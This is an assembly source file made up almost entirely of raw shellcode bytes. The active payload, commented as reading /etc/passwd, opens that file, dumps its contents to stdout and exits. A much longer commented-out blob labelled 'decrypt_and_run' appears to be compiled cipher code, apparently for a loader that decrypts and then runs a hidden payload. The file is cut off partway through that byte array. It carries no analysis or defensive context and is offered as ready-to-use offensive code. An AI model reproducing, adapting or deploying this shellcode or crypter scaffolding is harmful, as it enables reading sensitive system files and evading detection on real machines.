global _start


section .text
_start:
    jmp _shellcode

_shellcode:
    ; read /etc/passwd, with null bytes
    db 0xeb, 0x36, 0xb8, 0x05, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0xcd, 0x80, 0x89, 0xc3, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x89, 0xe7, 0x89, 0xf9, 0xba, 0x00, 0x10, 0x00, 0x00, 0xcd, 0x80, 0x89, 0xc2, 0xb8, 0x04, 0x00, 0x00, 0x00, 0xbb, 0x01, 0x00, 0x00, 0x00, 0xcd, 0x80, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xbb, 0x00, 0x00, 0x00, 0x00, 0xcd, 0x80, 0xe8, 0xc5, 0xff, 0xff, 0xff, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x00
    
    ; decrypt_and_run 
    ; db 0x53, 0x83, 0xec, 0x08, 0xe8, 0xa7, 0x00, 0x00, 0x00, 0x81, 0xc3, 0xf7, 0x3f, 0x00, 0x00, 0x8b, 0x83, 0xf4, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x02, 0xff, 0xd0, 0x83, 0xc4, 0x08, 0x5b, 0xc3, 0xff, 0xb3, 0x04, 0x00, 0x00, 0x00, 0xff, 0xa3, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xa3, 0x0c, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe0, 0xff, 0xff, 0xff, 0xff, 0xa3, 0x10, 0x00, 0x00, 0x00, 0x68, 0x08, 0x00, 0x00, 0x00, 0xe9, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xa3, 0x14, 0x00, 0x00, 0x00, 0x68, 0x10, 0x00, 0x00, 0x00, 0xe9, 0xc0, 0xff, 0xff, 0xff, 0xff, 0xa3, 0xf0, 0xff, 0xff, 0xff, 0x66, 0x90, 0x31, 0xed, 0x5e, 0x89, 0xe1, 0x83, 0xe4, 0xf0, 0x50, 0x54, 0x52, 0xe8, 0x22, 0x00, 0x00, 0x00, 0x81, 0xc3, 0x80, 0x3f, 0x00, 0x00, 0x8d, 0x83, 0x40, 0xd7, 0xff, 0xff, 0x50, 0x8d, 0x83, 0xe0, 0xd6, 0xff, 0xff, 0x50, 0x51, 0x56, 0xff, 0xb3, 0xf8, 0xff, 0xff, 0xff, 0xe8, 0xaf, 0xff, 0xff, 0xff, 0xf4, 0x8b, 0x1c, 0x24, 0xc3, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x8b, 0x1c, 0x24, 0xc3, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0xe8, 0xe4, 0x00, 0x00, 0x00, 0x81, 0xc2, 0x3b, 0x3f, 0x00, 0x00, 0x8d, 0x8a, 0x20, 0x00, 0x00, 0x00, 0x8d, 0x82, 0x20, 0x00, 0x00, 0x00, 0x39, 0xc8, 0x74, 0x1d, 0x8b, 0x82, 0xec, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x13, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x14, 0x51, 0xff, 0xd0, 0x83, 0xc4, 0x10, 0xc9, 0xc3, 0x8d, 0x74, 0x26, 0x00, 0x90, 0xc3, 0x8d, 0xb4, 0x26, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xa4, 0x00, 0x00, 0x00, 0x81, 0xc2, 0xfb, 0x3e, 0x00, 0x00, 0x55, 0x89, 0xe5, 0x53, 0x8d, 0x8a, 0x20, 0x00, 0x00, 0x00, 0x8d, 0x82, 0x20, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04, 0x29, 0xc8, 0x89, 0xc3, 0xc1, 0xe8, 0x1f, 0xc1, 0xfb, 0x02, 0x01, 0xd8, 0xd1, 0xf8, 0x74, 0x14, 0x8b, 0x92, 0xfc, 0xff, 0xff, 0xff, 0x85, 0xd2, 0x74, 0x0a, 0x83, 0xec, 0x08, 0x50, 0x51, 0xff, 0xd2, 0x83, 0xc4, 0x10, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x8d, 0xb4, 0x26, 0x00, 0x00, 0x00, 0x00, 0x66, 0x90, 0xf3, 0x0f, 0x1e, 0xfb, 0x55, 0x89, 0xe5, 0x53, 0xe8, 0x53, 0xff, 0xff, 0xff, 0x81, 0xc3, 0xa3, 0x3e, 0x00, 0x00, 0x83, 0xec, 0x04, 0x80, 0xbb, 0x20, 0x00, 0x00, 0x00, 0x00, 0x75, 0x27, 0x8b, 0x83, 0xf0, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x11, 0x83, 0xec, 0x0c, 0xff, 0xb3, 0x1c, 0x00, 0x00, 0x00, 0xe8, 0xd9, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x10, 0xe8, 0x31, 0xff, 0xff, 0xff, 0xc6, 0x83, 0x20, 0x00, 0x00, 0x00, 0x01, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x8d, 0x74, 0x26, 0x00, 0x90, 0xf3, 0x0f, 0x1e, 0xfb, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x8b, 0x14, 0x24, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x83, 0xec, 0x20, 0xe8, 0xfe, 0x13, 0x00, 0x00, 0x05, 0x46, 0x3e, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x8a, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x01, 0xca, 0x8b, 0x4d, 0xf4, 0x8d, 0x1c, 0x8d, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x01, 0xd9, 0x0f, 0xb6, 0x12, 0x88, 0x11, 0x8b, 0x55, 0xf4, 0xc1, 0xe2, 0x02, 0x8d, 0x4a, 0x01, 0x8b, 0x55, 0x0c, 0x01, 0xca, 0x8b, 0x4d, 0xf4, 0xc1, 0xe1, 0x02, 0x8d, 0x59, 0x01, 0x8b, 0x4d, 0x08, 0x01, 0xd9, 0x0f, 0xb6, 0x12, 0x88, 0x11, 0x8b, 0x55, 0xf4, 0xc1, 0xe2, 0x02, 0x8d, 0x4a, 0x02, 0x8b, 0x55, 0x0c, 0x01, 0xca, 0x8b, 0x4d, 0xf4, 0xc1, 0xe1, 0x02, 0x8d, 0x59, 0x02, 0x8b, 0x4d, 0x08, 0x01, 0xd9, 0x0f, 0xb6, 0x12, 0x88, 0x11, 0x8b, 0x55, 0xf4, 0xc1, 0xe2, 0x02, 0x8d, 0x4a, 0x03, 0x8b, 0x55, 0x0c, 0x01, 0xca, 0x8b, 0x4d, 0xf4, 0xc1, 0xe1, 0x02, 0x8d, 0x59, 0x03, 0x8b, 0x4d, 0x08, 0x01, 0xd9, 0x0f, 0xb6, 0x12, 0x88, 0x11, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x03, 0x0f, 0x86, 0x6c, 0xff, 0xff, 0xff, 0xc7, 0x45, 0xf4, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x74, 0x01, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x83, 0xea, 0x01, 0xc1, 0xe2, 0x02, 0x89, 0x55, 0xf0, 0x8b, 0x4d, 0x08, 0x8b, 0x55, 0xf0, 0x01, 0xca, 0x0f, 0xb6, 0x12, 0x88, 0x55, 0xe4, 0x8b, 0x55, 0xf0, 0x8d, 0x4a, 0x01, 0x8b, 0x55, 0x08, 0x01, 0xca, 0x0f, 0xb6, 0x12, 0x88, 0x55, 0xe5, 0x8b, 0x55, 0xf0, 0x8d, 0x4a, 0x02, 0x8b, 0x55, 0x08, 0x01, 0xca, 0x0f, 0xb6, 0x12, 0x88, 0x55, 0xe6, 0x8b, 0x55, 0xf0, 0x8d, 0x4a, 0x03, 0x8b, 0x55, 0x08, 0x01, 0xca, 0x0f, 0xb6, 0x12, 0x88, 0x55, 0xe7, 0x8b, 0x55, 0xf4, 0x83, 0xe2, 0x03, 0x85, 0xd2, 0x0f, 0x85, 0x82, 0x00, 0x00, 0x00, 0x0f, 0xb6, 0x55, 0xe4, 0x88, 0x55, 0xef, 0x0f, 0xb6, 0x55, 0xe5, 0x88, 0x55, 0xe4, 0x0f, 0xb6, 0x55, 0xe6, 0x88, 0x55, 0xe5, 0x0f, 0xb6, 0x55, 0xe7, 0x88, 0x55, 0xe6, 0x0f, 0xb6, 0x55, 0xef, 0x88, 0x55, 0xe7, 0x0f, 0xb6, 0x55, 0xe4, 0x0f, 0xb6, 0xd2, 0x0f, 0xb6, 0x94, 0x10, 0x20, 0xe0, 0xff, 0xff, 0x88, 0x55, 0xe4, 0x0f, 0xb6, 0x55, 0xe5, 0x0f, 0xb6, 0xd2, 0x0f, 0xb6, 0x94, 0x10, 0x20, 0xe0, 0xff, 0xff, 0x88, 0x55, 0xe5, 0x0f, 0xb6, 0x55, 0xe6, 0x0f, 0xb6, 0xd2, 0x0f, 0xb6, 0x94, 0x10, 0x20, 0xe0, 0xff, 0xff, 0x88, 0x55, 0xe6, 0x0f, 0xb6, 0x55, 0xe7, 0x0f, 0xb6, 0xd2, 0x0f, 0xb6, 0x94, 0x10, 0x20, 0xe0, 0xff, 0xff, 0x88, 0x55, 0xe7, 0x0f, 0xb6, 0x4d, 0xe4, 0x8b, 0x55, 0xf4, 0xc1, 0xea, 0x02, 0x0f, 0xb6, 0x94, 0x10, 0x20, 0xe2, 0xff, 0xff, 0x31, 0xca, 0x88, 0x55, 0xe4, 0x8b, 0x55, 0xf4, 0xc1, 0xe2, 0x02, 0x89, 0x55, 0xe8, 0x8b, 0x55, 0xf4, 0x83, 0xea, 0x04, 0xc1, 0xe2, 0x02, 0x89, 0x55, 0xf0, 0x8b, 0x4d, 0x08, 0x8b, 0x55, 0xf0, 0x01, 0xca, 0x0f, 0xb6, 0x1a, 0x0f, 0xb6, 0x4d, 0xe4, 0x8b, 0x75, 0x08, 0x8b, 0x55, 0xe8, 0x01, 0xf2, 0x31, 0xd9, 0x88, 0x0a, 0x8b, 0x55, 0xf0, 0x8d, 0x4a, 0x01, 0x8b, 0x55, 0x08, 0x01, 0xca, 0x0f, 0xb6, 0x1a, 0x0f, 0xb6, 0x4d, 0xe5, 0x8b, 0x55, 0xe8, 0x8d, 0x72, 0x01, 0x8b, 0x55, 0x08, 0x01, 0xf2, 0x31, 0xd9, 0x88, 0x0a, 0x8b, 0x55, 0xf0, 0x8d, 0x4a, 0x02, 0x8b, 0x55, 0x08, 0x01, 0xca, 0x0f, 0xb6, 0x1a, 0x0f, 0xb6, 0x4d, 0xe6, 0x8b, 0x55, 0xe8, 0x8d, 0x72, 0x02, 0x8b, 0x55, 0x08, 0x01, 0xf2, 0x31, 0xd9, 0x88, 0x0a, 0x8b, 0x55, 0xf0, 0x8d, 0x4a, 0x03, 0x8b, 0x55, 0x08, 0x01, 0xca, 0x0f, 0xb6, 0x1a, 0x0f, 0xb6, 0x4d, 0xe7, 0x8b, 0x55, 0xe8, 0x8d, 0x72, 0x03, 0x8b, 0x55, 0x08, 0x01, 0xf2, 0x31, 0xd9, 0x88, 0x0a, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x2b, 0x0f, 0x86, 0x82, 0xfe, 0xff, 0xff, 0x90, 0x90, 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xe8, 0xbe, 0x11, 0x00, 0x00, 0x05, 0x06, 0x3c, 0x00, 0x00, 0x8b, 0x45, 0x08, 0xff, 0x75, 0x0c, 0x50, 0xe8, 0xa2, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x08, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec, 0x04, 0xe8, 0x93, 0xfc, 0xff, 0xff, 0x81, 0xc3, 0xe3, 0x3b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0xff, 0x75, 0x0c, 0x50, 0xe8, 0x7e, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x08, 0x8b, 0x45, 0x08, 0x05, 0xb0, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04, 0x6a, 0x10, 0xff, 0x75, 0x10, 0x50, 0xe8, 0xf8, 0xfb, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec, 0x04, 0xe8, 0x5b, 0x11, 0x00, 0x00, 0x05, 0xa3, 0x3b, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81, 0xc2, 0xb0, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04, 0x6a, 0x10, 0xff, 0x75, 0x0c, 0x52, 0x89, 0xc3, 0xe8, 0xc5, 0xfb, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec, 0x14, 0xe8, 0x28, 0x11, 0x00, 0x00, 0x05, 0x70, 0x3b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x88, 0x45, 0xe8, 0xc6, 0x45, 0xfb, 0x00, 0xeb, 0x67, 0xc6, 0x45, 0xfa, 0x00, 0xeb, 0x57, 0x0f, 0xb6, 0x45, 0xfb, 0x0f, 0xb6, 0x55, 0xfa, 0x8b, 0x4d, 0x0c, 0xc1, 0xe0, 0x02, 0x01, 0xc8, 0x01, 0xd0, 0x0f, 0xb6, 0x18, 0x0f, 0xb6, 0x45, 0xe8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xb6, 0x45, 0xfb, 0x01, 0xd0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xb6, 0x45, 0xfa, 0x01, 0xd0, 0x89, 0xc2, 0x8b, 0x45, 0x10, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x0f, 0xb6, 0x45, 0xfb, 0x0f, 0xb6, 0x4d, 0xfa, 0x31, 0xda, 0x8b, 0x5d, 0x0c, 0xc1, 0xe0, 0x02, 0x01, 0xd8, 0x01, 0xc8, 0x88, 0x10, 0x80, 0x45, 0xfa, 0x01, 0x80, 0x7d, 0xfa, 0x03, 0x76, 0xa3, 0x80, 0x45, 0xfb, 0x01, 0x80, 0x7d, 0xfb, 0x03, 0x76, 0x93, 0x90, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x83, 0xec, 0x10, 0xe8, 0x86, 0xfc, 0xff, 0xff, 0x81, 0xc2, 0xdd, 0x3a, 0x00, 0x00, 0xc6, 0x45, 0xf3, 0x00, 0xeb, 0x4c, 0xc6, 0x45, 0xf2, 0x00, 0xeb, 0x3c, 0x0f, 0xb6, 0x45, 0xf2, 0x0f, 0xb6, 0x4d, 0xf3, 0x8b, 0x5d, 0x08, 0xc1, 0xe0, 0x02, 0x01, 0xd8, 0x01, 0xc8, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x0f, 0xb6, 0x5d, 0xf2, 0x0f, 0xb6, 0x75, 0xf3, 0x0f, 0xb6, 0x8c, 0x02, 0x20, 0xe0, 0xff, 0xff, 0x8b, 0x7d, 0x08, 0x8d, 0x04, 0x9d, 0x00, 0x00, 0x00, 0x00, 0x01, 0xf8, 0x01, 0xf0, 0x88, 0x08, 0x80, 0x45, 0xf2, 0x01, 0x80, 0x7d, 0xf2, 0x03, 0x76, 0xbe, 0x80, 0x45, 0xf3, 0x01, 0x80, 0x7d, 0xf3, 0x03, 0x76, 0xae, 0x90, 0x90, 0x83, 0xc4, 0x10, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0xe8, 0x22, 0x10, 0x00, 0x00, 0x05, 0x6a, 0x3a, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x40, 0x01, 0x88, 0x45, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x50, 0x05, 0x8b, 0x45, 0x08, 0x88, 0x50, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x50, 0x09, 0x8b, 0x45, 0x08, 0x88, 0x50, 0x05, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x50, 0x0d, 0x8b, 0x45, 0x08, 0x88, 0x50, 0x09, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x55, 0xff, 0x88, 0x50, 0x0d, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x40, 0x02, 0x88, 0x45, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x50, 0x0a, 0x8b, 0x45, 0x08, 0x88, 0x50, 0x02, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x55, 0xff, 0x88, 0x50, 0x0a, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x40, 0x06, 0x88, 0x45, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x50, 0x0e, 0x8b, 0x45, 0x08, 0x88, 0x50, 0x06, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x55, 0xff, 0x88, 0x50, 0x0e, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x40, 0x03, 0x88, 0x45, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x50, 0x0f, 0x8b, 0x45, 0x08, 0x88, 0x50, 0x03, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x50, 0x0b, 0x8b, 0x45, 0x08, 0x88, 0x50, 0x0f, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x50, 0x07, 0x8b, 0x45, 0x08, 0x88, 0x50, 0x0b, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x55, 0xff, 0x88, 0x50, 0x07, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x04, 0xe8, 0x57, 0x0f, 0x00, 0x00, 0x05, 0x9f, 0x39, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x45, 0xfc, 0x01, 0xc0, 0x89, 0xc1, 0x0f, 0xb6, 0x45, 0xfc, 0xc0, 0xe8, 0x07, 0x89, 0xc2, 0x89, 0xd0, 0x01, 0xc0, 0x01, 0xd0, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd0, 0x31, 0xc8, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0xe8, 0x1d, 0x0f, 0x00, 0x00, 0x05, 0x65, 0x39, 0x00, 0x00, 0xc6, 0x45, 0xff, 0x00, 0xe9, 0x70, 0x01, 0x00, 0x00, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x04, 0x90, 0x88, 0x45, 0xfe, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x0c, 0x90, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x44, 0x90, 0x01, 0x31, 0xc1, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x44, 0x90, 0x02, 0x31, 0xc1, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x44, 0x90, 0x03, 0x31, 0xc8, 0x88, 0x45, 0xfd, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x0c, 0x90, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x44, 0x90, 0x01, 0x31, 0xc8, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x45, 0xfc, 0x50, 0xe8, 0x41, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x0c, 0x90, 0x0f, 0xb6, 0x45, 0xfc, 0x32, 0x45, 0xfd, 0x0f, 0xb6, 0x55, 0xff, 0x31, 0xc1, 0x8b, 0x45, 0x08, 0x88, 0x0c, 0x90, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x4c, 0x90, 0x01, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x44, 0x90, 0x02, 0x31, 0xc8, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x45, 0xfc, 0x50, 0xe8, 0xf6, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x4c, 0x90, 0x01, 0x0f, 0xb6, 0x45, 0xfc, 0x32, 0x45, 0xfd, 0x0f, 0xb6, 0x55, 0xff, 0x31, 0xc1, 0x8b, 0x45, 0x08, 0x88, 0x4c, 0x90, 0x01, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x4c, 0x90, 0x02, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x44, 0x90, 0x03, 0x31, 0xc8, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x45, 0xfc, 0x50, 0xe8, 0xa9, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x4c, 0x90, 0x02, 0x0f, 0xb6, 0x45, 0xfc, 0x32, 0x45, 0xfd, 0x0f, 0xb6, 0x55, 0xff, 0x31, 0xc1, 0x8b, 0x45, 0x08, 0x88, 0x4c, 0x90, 0x02, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x44, 0x90, 0x03, 0x32, 0x45, 0xfe, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x45, 0xfc, 0x50, 0xe8, 0x67, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x88, 0x45, 0xfc, 0x0f, 0xb6, 0x55, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x4c, 0x90, 0x03, 0x0f, 0xb6, 0x45, 0xfc, 0x32, 0x45, 0xfd, 0x0f, 0xb6, 0x55, 0xff, 0x31, 0xc1, 0x8b, 0x45, 0x08, 0x88, 0x4c, 0x90, 0x03, 0x80, 0x45, 0xff, 0x01, 0x80, 0x7d, 0xff, 0x03, 0x0f, 0x86, 0x86, 0xfe, 0xff, 0xff, 0x90, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x83, 0xec, 0x14, 0xe8, 0x84, 0x0d, 0x00, 0x00, 0x05, 0xcc, 0x37, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xb1, 0x08, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xf4, 0x0f, 0xb6, 0x04, 0x90, 0x88, 0x45, 0xf3, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xf4, 0x0f, 0xb6, 0x44, 0x90, 0x01, 0x88, 0x45, 0xf2, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xf4, 0x0f, 0xb6, 0x44, 0x90, 0x02, 0x88, 0x45, 0xf1, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xf4, 0x0f, 0xb6, 0x44, 0x90, 0x03, 0x88, 0x45, 0xf0, 0x0f, 0xb6, 0x45, 0xf3, 0x50, 0xe8, 0xd0, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xc4, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xb8, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xac, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0x45, 0xf2, 0x50, 0xe8, 0x9f, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x93, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0x45, 0xf2, 0x50, 0xe8, 0x86, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x7a, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x6e, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x62, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0x45, 0xf1, 0x50, 0xe8, 0x55, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0x45, 0xf1, 0x50, 0xe8, 0x48, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x3c, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x30, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x24, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0x45, 0xf0, 0x50, 0xe8, 0x17, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0x45, 0xf0, 0x50, 0xe8, 0x0a, 0xfd, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xfe, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0x45, 0xf0, 0x50, 0xe8, 0xf1, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xe5, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xd9, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xcd, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0x45, 0xf3, 0x50, 0xe8, 0xc0, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x89, 0xc3, 0x0f, 0xb6, 0x45, 0xf3, 0x50, 0xe8, 0xb1, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xa5, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x31, 0xc3, 0x0f, 0xb6, 0x45, 0xf3, 0x50, 0xe8, 0x96, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x8a, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x7e, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x89, 0xde, 0x31, 0xc6, 0x0f, 0xb6, 0x45, 0xf2, 0x50, 0xe8, 0x6d, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x32, 0x45, 0xf2, 0x89, 0xc3, 0x0f, 0xb6, 0x45, 0xf2, 0x50, 0xe8, 0x5b, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x4f, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x43, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x31, 0xd8, 0x31, 0xc6, 0x0f, 0xb6, 0x45, 0xf1, 0x50, 0xe8, 0x32, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x26, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x32, 0x45, 0xf1, 0x89, 0xc3, 0x0f, 0xb6, 0x45, 0xf1, 0x50, 0xe8, 0x14, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0x08, 0xfc, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xfc, 0xfb, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x31, 0xd8, 0x89, 0xf3, 0x31, 0xc3, 0x0f, 0xb6, 0x45, 0xf0, 0x50, 0xe8, 0xe9, 0xfb, 0xff, 0xff, 0x83, 0xc4, 0x04, 0x0f, 0xb6, 0xc0, 0x50, 0xe8, 0xdd, 0xfb, 